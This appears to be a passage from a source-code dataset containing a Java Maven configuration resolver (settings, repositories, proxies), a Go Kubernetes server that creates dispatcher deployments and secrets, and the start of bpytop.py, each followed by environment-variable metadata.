Boolean.valueOf(m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_CERTIFICATE_CHECK)));
}
return get(m_pid + ServiceConstants.PROPERTY_CERTIFICATE_CHECK);
}
/**
     * Returns the URL of the settings file. It will first try to use the url as is. If a malformed
     * url is encountered, it will try to use the url as a file path. If it is still not valid, the
     * settings file is skipped with a warning.
*
* @see MavenConfiguration#getSettingsFileUrl()
*/
public URL getSettingsFileUrl() {
if (!contains(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE)) {
String spec = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE);
if (spec == null) {
spec = safeGetFile(System.getProperty("user.home") + "/.m2/settings.xml");
}
if (spec == null) {
spec = safeGetFile(System.getProperty("maven.home") + "/conf/settings.xml");
}
if (spec == null) {
spec = safeGetFile(System.getenv("M2_HOME") + "/conf/settings.xml");
}
if (spec != null) {
try {
return set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, new URL(spec));
}
catch (MalformedURLException e) {
File file = new File(spec);
if (file.exists()) {
try {
return set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, file.toURI()
.toURL());
}
catch (MalformedURLException ignore) {
// ignore as it usually should not happen since we already have a file
}
}
else {
LOGGER
.warn("Settings file ["
+ spec
+ "] cannot be used and will be skipped (malformed url or file does not exist)");
set(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE, null);
}
}
}
}
return get(m_pid + ServiceConstants.PROPERTY_SETTINGS_FILE);
}
private String safeGetFile(String path) {
if (path != null) {
File file = new File(path);
if (file.exists() && file.canRead() && file.isFile()) {
try {
return file.toURI().toURL().toExternalForm();
}
catch (MalformedURLException e) {
// Ignore
}
}
}
return null;
}
public List<MavenRepositoryURL> getDefaultRepositories() throws MalformedURLException {
if (!contains(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES)) {
// look for repositories property
String defaultRepositoriesProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES);
// build repositories list
final List<MavenRepositoryURL> defaultRepositoriesProperty = new ArrayList<MavenRepositoryURL>();
if (defaultRepositoriesProp != null && defaultRepositoriesProp.trim().length() > 0) {
String[] repositories = defaultRepositoriesProp.split(REPOSITORIES_SEPARATOR);
for (String repositoryURL : repositories) {
defaultRepositoriesProperty.add(new MavenRepositoryURL(repositoryURL.trim()));
}
}
LOGGER.trace("Using default repositories [" + defaultRepositoriesProperty + "]");
return set(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES,
defaultRepositoriesProperty);
}
return get(m_pid + ServiceConstants.PROPERTY_DEFAULT_REPOSITORIES);
}
/**
     * Repository is a comma separated list of repositories to be used. If repository access
     * requires authentication, the user name and password must be specified in the repository url,
     * for example http://user:[email protected]/maven2.<br/>
     * If the repository from 1/2 below starts with a plus (+), option 3 is also used and the
     * repositories from settings.xml will be accumulated.<br/>
     * Repository resolution:<br/>
     * 1. looks for a configuration property named repository;<br/>
     * 2. looks for a framework property/system setting repository;<br/>
     * 3. looks in settings.xml (see settings.xml resolution). In this case all configured
     * repositories will be used, including the configured user/password, and the central
     * repository is also added. Note that the local repository is added as the first repository if
     * it exists.
*
* @see MavenConfiguration#getRepositories()
* @see MavenConfiguration#getLocalRepository()
*/
public List<MavenRepositoryURL> getRepositories() throws MalformedURLException {
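        // Illustrative property value (assumed): "+https://repo.example.org/maven2@id=example@snapshots"
        // where the leading '+' keeps the repositories configured in settings.xml in addition to this one.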
if (!contains(m_pid + ServiceConstants.PROPERTY_REPOSITORIES)) {
// look for repositories property
String repositoriesProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_REPOSITORIES);
// if not set or starting with a plus (+) get repositories from settings xml
if ((repositoriesProp == null || repositoriesProp.startsWith(REPOSITORIES_APPEND_SIGN))
&& settings != null) {
String init = (repositoriesProp == null) ? "" : repositoriesProp.substring(1);
StringBuilder builder = new StringBuilder(init);
Map<String, Profile> profiles = settings.getProfilesAsMap();
for (String activeProfile : getActiveProfiles(true)) {
Profile profile = profiles.get(activeProfile);
if (profile == null) {
continue;
}
for (Repository repo : profile.getRepositories()) {
if (builder.length() > 0) {
builder.append(REPOSITORIES_SEPARATOR);
}
builder.append(repo.getUrl());
builder.append("@id=");
builder.append(repo.getId());
if (repo.getReleases() != null && !repo.getReleases().isEnabled()) {
builder.append("@noreleases");
}
if (repo.getSnapshots() != null && repo.getSnapshots().isEnabled()) {
builder.append("@snapshots");
}
if (repo.getReleases() != null && repo.getReleases().isEnabled()) {
if (repo.getReleases().getUpdatePolicy() != null) {
builder.append("@releasesUpdate=").append(repo.getReleases().getUpdatePolicy());
}
if (repo.getReleases().getChecksumPolicy() != null) {
builder.append("@releasesChecksum=").append(repo.getReleases().getChecksumPolicy());
}
}
if (repo.getSnapshots() != null && repo.getSnapshots().isEnabled()) {
if (repo.getSnapshots().getUpdatePolicy() != null) {
builder.append("@snapshotsUpdate=").append(repo.getSnapshots().getUpdatePolicy());
}
if (repo.getSnapshots().getChecksumPolicy() != null) {
builder.append("@snapshotsChecksum=").append(repo.getSnapshots().getChecksumPolicy());
}
}
}
}
repositoriesProp = builder.toString();
}
// build repositories list
final List<MavenRepositoryURL> repositoriesProperty = new ArrayList<MavenRepositoryURL>();
if (m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPO_AS_REMOTE) != null) {
MavenRepositoryURL localRepository = getDefaultLocalRepository();
if (localRepository != null) {
repositoriesProperty.add(localRepository);
}
}
if (repositoriesProp != null && repositoriesProp.trim().length() > 0) {
String[] repositories = repositoriesProp.split(REPOSITORIES_SEPARATOR);
for (String repositoryURL : repositories) {
repositoriesProperty.add(new MavenRepositoryURL(repositoryURL.trim()));
}
}
LOGGER.trace("Using remote repositories [" + repositoriesProperty + "]");
return set(m_pid + ServiceConstants.PROPERTY_REPOSITORIES, repositoriesProperty);
}
return get(m_pid + ServiceConstants.PROPERTY_REPOSITORIES);
}
/**
* Returns active profile names from current settings
* @param alsoActiveByDefault if <code>true</code>, also return these profile names that are
* <code><activeByDefault></code>
* @return
*/
private Collection<String> getActiveProfiles(boolean alsoActiveByDefault) {
Set<String> profileNames = new LinkedHashSet<String>(settings.getActiveProfiles());
if (alsoActiveByDefault) {
for (Profile profile : settings.getProfiles()) {
if (profile.getActivation() != null && profile.getActivation().isActiveByDefault()) {
// TODO: check other activations - file/jdk/os/property?
profileNames.add(profile.getId());
}
}
}
return profileNames;
}
public String getGlobalUpdatePolicy() {
final String propertyName = m_pid + ServiceConstants.PROPERTY_GLOBAL_UPDATE_POLICY;
if (contains(propertyName)) {
return get(propertyName);
}
final String propertyValue = m_propertyResolver.get(propertyName);
if (propertyValue != null) {
set(propertyName, propertyValue);
return propertyValue;
}
return null;
}
public String getGlobalChecksumPolicy() {
final String propertyName = m_pid + ServiceConstants.PROPERTY_GLOBAL_CHECKSUM_POLICY;
if (contains(propertyName)) {
return get(propertyName);
}
final String propertyValue = m_propertyResolver.get(propertyName);
if (propertyValue != null) {
set(propertyName, propertyValue);
return propertyValue;
}
return null;
}
/**
* Resolves local repository directory by using the following resolution:<br/>
     * 1. looks for a configuration property named localRepository;<br/>
     * 2. looks for a framework property/system setting localRepository;<br/>
* 3. looks in settings.xml (see settings.xml resolution);<br/>
* 4. falls back to ${user.home}/.m2/repository.
*
* @see MavenConfiguration#getLocalRepository()
*/
public MavenRepositoryURL getLocalRepository() {
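        // For example (illustrative path): a resolved value of "/home/user/.m2/repository" becomes the
        // repository spec "/home/user/.m2/repository@snapshots@id=local" before being parsed.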
if (!contains(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY)) {
// look for a local repository property
String spec = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
// if not set get local repository from maven settings
if (spec == null && settings != null) {
spec = settings.getLocalRepository();
}
if (spec == null) {
spec = System.getProperty("user.home") + "/.m2/repository";
}
if (spec != null) {
if (!spec.toLowerCase().contains("@snapshots")) {
spec += "@snapshots";
}
spec += "@id=local";
// check if we have a valid url
try {
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY,
new MavenRepositoryURL(spec));
}
catch (MalformedURLException e) {
// maybe is just a file?
try {
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY,
new MavenRepositoryURL(new File(spec).toURI().toASCIIString()));
}
catch (MalformedURLException ignore) {
LOGGER.warn("Local repository [" + spec
+ "] cannot be used and will be skipped");
return set(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY, null);
}
}
}
}
return get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
}
public MavenRepositoryURL getDefaultLocalRepository() {
if (settings != null) {
String spec = settings.getLocalRepository();
if (spec == null) {
spec = System.getProperty("user.home") + "/.m2/repository";
}
if (!spec.toLowerCase().contains("@snapshots")) {
spec += "@snapshots";
}
spec += "@id=defaultlocal";
// check if we have a valid url
try {
return new MavenRepositoryURL(spec);
}
catch (MalformedURLException e) {
// maybe is just a file?
try {
return new MavenRepositoryURL(new File(spec).toURI().toASCIIString());
}
catch (MalformedURLException ignore) {
LOGGER.warn("Local repository [" + spec
+ "] cannot be used and will be skipped");
return null;
}
}
}
return null;
}
public Integer getTimeout() {
if (!contains(m_pid + ServiceConstants.PROPERTY_TIMEOUT)) {
String timeout = m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_TIMEOUT);
return set(m_pid + ServiceConstants.PROPERTY_TIMEOUT,
Integer.valueOf(timeout == null ? DEFAULT_TIMEOUT : timeout));
}
return get(m_pid + ServiceConstants.PROPERTY_TIMEOUT);
}
/**
* {@inheritDoc}
*/
public Boolean useFallbackRepositories() {
if (!contains(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES)) {
String useFallbackRepoProp = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES);
return set(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES,
Boolean.valueOf(useFallbackRepoProp == null ? "true" : useFallbackRepoProp));
}
return get(m_pid + ServiceConstants.PROPERTY_USE_FALLBACK_REPOSITORIES);
}
/**
* Enables the proxy server for a given URL.
*
* @deprecated This method has side-effects and is only used in the "old" resolver.
*/
public void enableProxy(URL url) {
final String protocol = url.getProtocol();
Map<String, String> proxyDetails = getProxySettings(url.getProtocol()).get(protocol);
if (proxyDetails != null) {
LOGGER.trace("Enabling proxy [" + proxyDetails + "]");
final String user = proxyDetails.get("user");
final String pass = proxyDetails.get("pass");
Authenticator.setDefault(new Authenticator() {
@Override
protected PasswordAuthentication getPasswordAuthentication() {
return new PasswordAuthentication(user, pass.toCharArray());
}
});
System.setProperty(protocol + ".proxyHost", proxyDetails.get("host"));
System.setProperty(protocol + ".proxyPort", proxyDetails.get("port"));
System.setProperty(protocol + ".nonProxyHosts", proxyDetails.get("nonProxyHosts"));
set(m_pid + ServiceConstants.PROPERTY_PROXY_SUPPORT, protocol);
}
}
private boolean isProtocolSupportEnabled(String... protocols) {
final String proxySupport = m_propertyResolver.get(m_pid
+ ServiceConstants.PROPERTY_PROXY_SUPPORT);
if (proxySupport == null) {
return ServiceConstants.PROPERTY_PROXY_SUPPORT_DEFAULT;
}
// simple cases:
if ("true".equalsIgnoreCase(proxySupport)) {
return true;
}
if ("false".equalsIgnoreCase(proxySupport)) {
return false;
}
// giving no protocols to test against, default to true.
if (protocols.length == 0) {
return true;
}
// differentiate by protocol:
for (String protocol : protocols) {
if (proxySupport.contains(protocol)) {
return true;
}
}
// not in list appearingly.
return false;
}
/**
* @deprecated
* @param protocols protocols to be recognized.
*
* @return
*/
public Map<String, Map<String, String>> getProxySettings(String... protocols) {
Map<String, Map<String, String>> pr = new HashMap<String, Map<String, String>>();
if (isProtocolSupportEnabled(protocols)) {
parseSystemWideProxySettings(pr);
parseProxiesFromProperty(
m_propertyResolver.get(m_pid + ServiceConstants.PROPERTY_PROXIES), pr);
// if( pr.isEmpty() ) {
// if( m_settings == null ) { return Collections.emptyMap(); }
//
// return m_settings.getProxySettings();
// }
}
return pr;
}
/**
* @deprecated
* @param pr
*/
private void parseSystemWideProxySettings(Map<String, Map<String, String>> pr) {
String httpHost = m_propertyResolver.get("http.proxyHost");
String httpPort = m_propertyResolver.get("http.proxyPort");
String httpnonProxyHosts = m_propertyResolver.get("http.nonProxyHosts");
if (httpHost != null) {
parseProxiesFromProperty("http:host=" + httpHost + ",port=" + httpPort
+ ",nonProxyHosts=" + httpnonProxyHosts, pr);
}
}
/**
* @deprecated
* @param proxySettings
* @param pr
*/
// example: http:host=foo,port=8080;https:host=bar,port=9090
private void parseProxiesFromProperty(String proxySettings, Map<String, Map<String, String>> pr) {
// TODO maybe make the parsing more clever via regex ;) Or not.
try {
if (proxySettings != null) {
String[] protocols = proxySettings.split(";");
for (String protocolSection : protocols) {
String[] section = protocolSection.split(":");
String protocolName = section[0];
Map<String, String> keyvalue = new HashMap<String, String>();
// set some defaults:
keyvalue.put("protocol", protocolName);
keyvalue.put("nonProxyHosts", "");
keyvalue.put("host", "localhost");
keyvalue.put("port", "80");
for (String keyvalueList : section[1].split(",")) {
String[] kv = keyvalueList.split("=");
String key = kv[0];
String value = kv[1];
keyvalue.put(key, value);
}
pr.put(protocolName, keyvalue);
}
}
}
catch (ArrayIndexOutOfBoundsException ex) {
throw new IllegalArgumentException(
"Proxy setting is set to "
                    + proxySettings
                    + ". But it should have this format: <protocol>:<key>=<value>,<key>=<value>;<protocol>:<key>=<value>,..");
}
}
private String getSettingsPath() {
URL url = getSettingsFileUrl();
return url == null ? null : url.getPath();
}
private String getLocalRepoPath(PropertyResolver props) {
return props.get(m_pid + ServiceConstants.PROPERTY_LOCAL_REPOSITORY);
}
private Settings buildSettings(String localRepoPath, String settingsPath,
boolean useFallbackRepositories) {
Settings settings;
if (settingsPath == null) {
settings = new Settings();
}
else {
DefaultSettingsBuilderFactory factory = new DefaultSettingsBuilderFactory();
DefaultSettingsBuilder builder = factory.newInstance();
SettingsBuildingRequest request = new DefaultSettingsBuildingRequest();
request.setUserSettingsFile(new File(settingsPath));
try {
SettingsBuildingResult result = builder.build(request);
settings = result.getEffectiveSettings();
}
catch (SettingsBuildingException exc) {
throw new AssertionError("cannot build settings", exc);
}
}
if (useFallbackRepositories) {
Profile fallbackProfile = new Profile();
Repository central = new Repository();
central.setId("central");
central.setUrl("http://repo1.maven.org/maven2");
fallbackProfile.setId("fallback");
fallbackProfile.setRepositories(Arrays.asList(central));
settings.addProfile(fallbackProfile);
settings.addActiveProfile("fallback");
}
if (localRepoPath != null) {
settings.setLocalRepository(localRepoPath);
}
return settings;
}
public Map<String, Map<String, String>> getMirrors() {
        // DO support mirrors via properties (just like we do for proxies).
// if( m_settings == null ) { return Collections.emptyMap(); }
// return m_settings.getMirrorSettings();
return Collections.emptyMap();
}
public Settings getSettings() {
return settings;
}
public void setSettings(Settings settings) {
this.settings = settings;
}
public String getSecuritySettings() {
String key = m_pid + ServiceConstants.PROPERTY_SECURITY;
if (!contains(key)) {
String spec = m_propertyResolver.get(key);
if (spec == null) {
spec = new File(System.getProperty("user.home"), ".m2/settings-security.xml")
.getPath();
}
return set(key, spec);
}
return get(key);
}
@Override
public <T> T getProperty(String name, T defaultValue, Class<T> clazz) {
if (!contains(m_pid + name)) {
String value = m_propertyResolver.get(m_pid + name);
return set(m_pid + name, value == null ? defaultValue : convert(value, clazz));
}
return get(m_pid + name);
}
@Override
public String getPid() {
return m_pid;
}
/**
* Supports String to [ Integer, Long, String, Boolean ] conversion
* @param value
* @param clazz
* @param <T>
* @return
*/
@SuppressWarnings("unchecked")
private <T> T convert(String value, Class<T> clazz) {
if (String.class == clazz) {
return (T) value;
}
if (Integer.class == clazz) {
return (T) Integer.valueOf(value);
}
if (Long.class == clazz) {
return (T) Long.valueOf(value);
}
if (Boolean.class == clazz) {
return (T) Boolean.valueOf("true".equals(value));
}
throw new IllegalArgumentException("Can't convert \"" + value + "\" to " + clazz + ".");
}
}
| [
"\"M2_HOME\""
]
| []
| [
"M2_HOME"
]
| [] | ["M2_HOME"] | java | 1 | 0 | |
internal/app/management/servers/kubernetes.go | //nolint: golint
package servers
import (
"encoding/base64"
"fmt"
"github.com/lawrencegripper/ion/internal/app/management/types"
"github.com/lawrencegripper/ion/internal/pkg/management/module"
"github.com/rs/xid"
log "github.com/sirupsen/logrus"
context "golang.org/x/net/context"
"k8s.io/apimachinery/pkg/api/errors"
"strconv"
"strings"
appsv1 "k8s.io/api/apps/v1"
apiv1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"os"
"path/filepath"
)
//Check at compile time if we implement the interface
var _ module.ModuleServiceServer = (*Kubernetes)(nil)
// Kubernetes management server
type Kubernetes struct {
client *kubernetes.Clientset
namespace string
AzureSPSecretRef string
AzureBlobStorageSecretRef string
AzureServiceBusSecretRef string
MongoDBSecretRef string
DispatcherImageName string
ID string
}
const createdByLabel = "ion/createdBy"
const moduleNameLabel = "ion/moduleName"
const idLabel = "ion/id"
var sharedServicesSecretName string
var sharedImagePullSecretName string
var logLevel string
func genID() string {
id := xid.New()
return id.String()[0:5]
}
// NewKubernetesManagementServer creates and initializes a new Kubernetes management server
func NewKubernetesManagementServer(config *types.Configuration) (*Kubernetes, error) {
k := Kubernetes{}
logLevel = config.LogLevel
k.ID = "management-api"
k.DispatcherImageName = config.DispatcherImage
var err error
k.client, err = getClientSet()
if err != nil {
return nil, fmt.Errorf("error connecting to Kubernetes %+v", err)
}
k.namespace = config.Namespace
err = k.createSharedServicesSecret(config)
if err != nil {
return nil, err
}
err = k.createSharedImagePullSecret(config)
if err != nil {
return nil, err
}
return &k, nil
}
// createSharedServicesSecret creates a shared secret
// that stores all the config needed by the dispatcher
// to operate i.e. dataplane provider connection
func (k *Kubernetes) createSharedServicesSecret(config *types.Configuration) error {
sharedServicesSecretName = fmt.Sprintf("services-%s", k.ID)
secret := &apiv1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: sharedServicesSecretName,
Labels: map[string]string{
createdByLabel: k.ID,
},
},
StringData: map[string]string{
"CLIENTID": config.AzureClientID,
"CLIENTSECRET": config.AzureClientSecret,
"SUBSCRIPTIONID": config.AzureSubscriptionID,
"TENANTID": config.AzureTenantID,
"SERVICEBUSNAMESPACE": config.AzureServiceBusNamespace,
"RESOURCEGROUP": config.AzureResourceGroup,
"AZUREBATCH_JOBID": config.AzureBatchJobID,
"AZUREBATCH_POOLID": config.AzureBatchPoolID,
"AZUREBATCH_BATCHACCOUNTLOCATION": config.AzureBatchAccountLocation,
"AZUREBATCH_BATCHACCOUNTNAME": config.AzureBatchAccountName,
"AZUREBATCH_REQUIRESGPU": strconv.FormatBool(config.AzureBatchRequiresGPU),
"AZUREBATCH_RESOURCEGROUP": config.AzureBatchResourceGroup,
"AZUREBATCH_IMAGEREPOSITORYSERVER": config.AzureBatchImageRepositoryServer,
"AZUREBATCH_IMAGEREPOSITORYPASSWORD": config.AzureBatchImageRepositoryPassword,
"AZUREBATCH_IMAGEREPOSITORYUSERNAME": config.AzureBatchImageRepositoryUsername,
"HANDLER_MONGODBDOCPROVIDER_PORT": strconv.Itoa(config.MongoDBPort),
"HANDLER_MONGODBDOCPROVIDER_NAME": config.MongoDBName,
"HANDLER_MONGODBDOCPROVIDER_PASSWORD": config.MongoDBPassword,
"HANDLER_MONGODBDOCPROVIDER_COLLECTION": config.MongoDBCollection,
"HANDLER_AZUREBLOBPROVIDER_BLOBACCOUNTNAME": config.AzureStorageAccountName,
"HANDLER_AZUREBLOBPROVIDER_BLOBACCOUNTKEY": config.AzureStorageAccountKey,
"LOGGING_APPINSIGHTS": config.AppInsightsKey,
},
}
if err := k.createSecretIfNotExist(secret); err != nil {
return err
}
return nil
}
// createSharedImagePullSecret creates a shared secret to store
// the module container registry connection details if they
// are provided. These will be used by the dispatcher to pull
// the module image.
func (k *Kubernetes) createSharedImagePullSecret(config *types.Configuration) error {
sharedImagePullSecretName = fmt.Sprintf("imagepull-%s", k.ID)
if config.ContainerImageRegistryUsername != "" &&
config.ContainerImageRegistryPassword != "" &&
config.ContainerImageRegistryURL != "" {
auth := encodeBase64(fmt.Sprintf("%s:%s", config.ContainerImageRegistryUsername, config.ContainerImageRegistryPassword))
dockerAuthConfig := fmt.Sprintf(`{"auths":{"%s":{"username":"%s","password":"%s","email":"%s","auth":"%s"}}}`,
config.ContainerImageRegistryURL,
config.ContainerImageRegistryUsername,
config.ContainerImageRegistryPassword,
config.ContainerImageRegistryEmail,
auth)
secret := &apiv1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: sharedImagePullSecretName,
Labels: map[string]string{
createdByLabel: k.ID,
},
},
Data: map[string][]byte{
".dockerconfigjson": []byte(dockerAuthConfig),
},
Type: apiv1.SecretTypeDockerConfigJson,
}
if err := k.createSecretIfNotExist(secret); err != nil {
return err
}
}
return nil
}
func (k *Kubernetes) createSecretIfNotExist(secret *apiv1.Secret) error {
secretsClient := k.client.CoreV1().Secrets(k.namespace)
_, err := secretsClient.Get(secret.Name, metav1.GetOptions{})
if errors.IsNotFound(err) {
fmt.Printf("secret %s not found, creating it\n", secret.Name)
_, err := secretsClient.Create(secret)
if err != nil {
return fmt.Errorf("error creating dispatcher secret %+v", err)
}
} else if statusError, isStatus := err.(*errors.StatusError); isStatus {
return fmt.Errorf("error getting secret %s: %v\n", secret.Name, statusError.ErrStatus.Message)
} else if err != nil {
return err
}
return nil
}
// Create will create the necessary services to support the execution of
// a module. This includes a configmap to hold the module's configuration
// and a deployment that runs a dispatcher pod. The dispatcher pod will
// orchestrate the execution of the module itself.
func (k *Kubernetes) Create(ctx context.Context, r *module.ModuleCreateRequest) (*module.ModuleCreateResponse, error) {
// a unique ID for this creation
id := fmt.Sprintf("%s-%s", r.Modulename, genID())
// Create a configmap to store the configuration details
// needed by the module. These will be mounted into the
// dispatcher as a volume and then passed on when it
// dispatches the module.
moduleConfigMapName := id
var stringBuilder strings.Builder
for k, v := range r.Configmap {
_, _ = stringBuilder.WriteString(fmt.Sprintf("%s=%s\n", k, v))
}
configMapStr := strings.TrimSuffix(stringBuilder.String(), "\n")
moduleConfigMap := &apiv1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{
Name: moduleConfigMapName,
Labels: map[string]string{
createdByLabel: k.ID,
idLabel: id,
moduleNameLabel: r.Modulename,
},
},
Data: map[string]string{
"module": configMapStr,
},
}
configMapClient := k.client.CoreV1().ConfigMaps(k.namespace)
_, err := configMapClient.Create(moduleConfigMap)
if err != nil {
return nil, fmt.Errorf("error creating module config map %+v", err)
}
configMapFilePath := "/etc/config"
useAzureBatchProvider := false
if r.Provider == "azurebatch" {
useAzureBatchProvider = true
}
// Create an argument list to pass to the dispatcher binary
dispatcherArgs := []string{
"start",
"--modulename=" + r.Modulename,
"--moduleconfigpath=" + fmt.Sprintf("%s/module", configMapFilePath),
"--subscribestoevent=" + r.Eventsubscriptions,
"--eventspublished=" + r.Eventpublications,
"--azurebatch.enabled=" + strconv.FormatBool(useAzureBatchProvider),
"--job.workerimage=" + r.Moduleimage,
"--job.handlerimage=" + r.Handlerimage,
"--job.retrycount=" + fmt.Sprintf("%d", r.Retrycount),
"--job.pullalways=false",
"--kubernetes.namespace=" + k.namespace,
"--kubernetes.imagepullsecretname=" + sharedImagePullSecretName,
"--loglevel=" + logLevel,
"--printconfig=true",
}
dispatcherDeploymentName := id
// Create a deployment that runs a dispatcher
// pod, passing in environment variables from
// a secret and mounting a volume from a configmap.
deployment := &appsv1.Deployment{
ObjectMeta: metav1.ObjectMeta{
Name: dispatcherDeploymentName,
Labels: map[string]string{
createdByLabel: k.ID,
idLabel: dispatcherDeploymentName,
moduleNameLabel: r.Modulename,
},
},
Spec: appsv1.DeploymentSpec{
Replicas: int32Ptr(r.Instancecount),
Selector: &metav1.LabelSelector{
MatchLabels: map[string]string{
"app": "ion-dispatcher",
},
},
Template: apiv1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Name: dispatcherDeploymentName,
Labels: map[string]string{
"app": "ion-dispatcher",
},
},
Spec: apiv1.PodSpec{
Containers: []apiv1.Container{
{
Name: "ion-dispatcher",
Image: k.DispatcherImageName,
Args: dispatcherArgs,
EnvFrom: []apiv1.EnvFromSource{
{
SecretRef: &apiv1.SecretEnvSource{
LocalObjectReference: apiv1.LocalObjectReference{
Name: sharedServicesSecretName,
},
},
},
},
VolumeMounts: []apiv1.VolumeMount{
{
Name: "module-config",
MountPath: configMapFilePath,
},
},
},
},
Volumes: []apiv1.Volume{
{
Name: "module-config",
VolumeSource: apiv1.VolumeSource{
ConfigMap: &apiv1.ConfigMapVolumeSource{
LocalObjectReference: apiv1.LocalObjectReference{
Name: moduleConfigMapName,
},
},
},
},
},
},
},
},
}
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
_, err = deploymentsClient.Create(deployment)
if err != nil {
return nil, fmt.Errorf("error creating dispatcher deployment %+v", err)
}
var createResponse = &module.ModuleCreateResponse{
Name: id,
}
return createResponse, nil
}
// Delete will delete all the components associated with a module deployment.
// This includes deleting the configmap that holds the module's configuration
// and the deployment of the module's dispatcher.
func (k *Kubernetes) Delete(ctx context.Context, r *module.ModuleDeleteRequest) (*module.ModuleDeleteResponse, error) {
// Find deployments with matching label and delete them
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployments, err := deploymentsClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", idLabel, r.Name),
})
if err != nil {
return nil, fmt.Errorf("error listing deployments with name %s", r.Name)
}
for _, deployment := range deployments.Items {
if err := deploymentsClient.Delete(deployment.Name, nil); err != nil {
return nil, fmt.Errorf("error deleting deployment %s", deployment.Name)
}
}
// Find configmaps with matching label and delete them
configMapClient := k.client.CoreV1().ConfigMaps(k.namespace)
configmaps, err := configMapClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", idLabel, r.Name),
})
if err != nil {
return nil, fmt.Errorf("error listing configmaps with name %s", r.Name)
}
for _, configmap := range configmaps.Items {
if err := configMapClient.Delete(configmap.Name, nil); err != nil {
return nil, fmt.Errorf("error deleting configmap %s", configmap.Name)
}
}
var deleteResponse = &module.ModuleDeleteResponse{
Name: r.Name,
}
return deleteResponse, nil
}
// List will list all the deployments that have been created by this
// management server. It simply lists each deployment's name.
func (k *Kubernetes) List(ctx context.Context, r *module.ModuleListRequest) (*module.ModuleListResponse, error) {
// Find deployments with matching label
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployments, err := deploymentsClient.List(metav1.ListOptions{
LabelSelector: fmt.Sprintf("%s=%s", createdByLabel, k.ID),
})
if err != nil {
return nil, fmt.Errorf("error listing deployments with label %s", k.ID)
}
var list = &module.ModuleListResponse{}
for _, deployment := range deployments.Items {
list.Names = append(list.Names, deployment.Name)
}
return list, nil
}
// Get will get information about a deployed module
func (k *Kubernetes) Get(ctx context.Context, r *module.ModuleGetRequest) (*module.ModuleGetResponse, error) {
// Get the deployment with the given name
deploymentsClient := k.client.AppsV1().Deployments(k.namespace)
deployment, err := deploymentsClient.Get(r.Name, metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("error getting deployments with name %s", r.Name)
}
var getResponse = &module.ModuleGetResponse{
Name: deployment.Name,
Status: string(deployment.Status.Conditions[0].Type),
StatusMessage: deployment.Status.Conditions[0].Message,
}
return getResponse, nil
}
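// encodeBase64 base64-encodes the given string, wrapping the encoded output
// at 70 characters per line when it spans multiple lines.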
func encodeBase64(s string) string {
const lineLen = 70
encLen := base64.StdEncoding.EncodedLen(len(s))
lines := encLen/lineLen + 1
buf := make([]byte, encLen*2+lines)
in := buf[0:encLen]
out := buf[encLen:]
base64.StdEncoding.Encode(in, []byte(s))
k := 0
for i := 0; i < len(in); i += lineLen {
j := i + lineLen
if j > len(in) {
j = len(in)
}
k += copy(out[k:], in[i:j])
if lines > 1 {
out[k] = '\n'
k++
}
}
return string(out[:k])
}
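// homeDir returns the current user's home directory on both unix and windows.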
func homeDir() string {
if h := os.Getenv("HOME"); h != "" {
return h
}
return os.Getenv("USERPROFILE") // windows
}
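// getClientSet builds a Kubernetes clientset, preferring the in-cluster config
// and falling back to the kubeconfig in the user's home directory when not
// running inside a cluster.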
func getClientSet() (*kubernetes.Clientset, error) {
config, err := rest.InClusterConfig()
if err != nil {
log.WithError(err).Warn("failed getting in-cluster config attempting to use kubeconfig from homedir")
var kubeconfig string
if home := homeDir(); home != "" {
kubeconfig = filepath.Join(home, ".kube", "config")
}
if _, err := os.Stat(kubeconfig); os.IsNotExist(err) {
log.WithError(err).Panic("kubeconfig not found in homedir")
}
// use the current context in kubeconfig
config, err = clientcmd.BuildConfigFromFlags("", kubeconfig)
if err != nil {
log.WithError(err).Panic("getting kubeconf from current context")
return nil, err
}
}
// create the clientset
clientset, err := kubernetes.NewForConfig(config)
if err != nil {
log.WithError(err).Error("Getting clientset from config")
return nil, err
}
return clientset, nil
}
func int32Ptr(i int32) *int32 { return &i }
| [
"\"HOME\"",
"\"USERPROFILE\""
]
| []
| [
"HOME",
"USERPROFILE"
]
| [] | ["HOME", "USERPROFILE"] | go | 2 | 0 | |
bpytop.py | #!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2021 Aristocratos ([email protected])
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
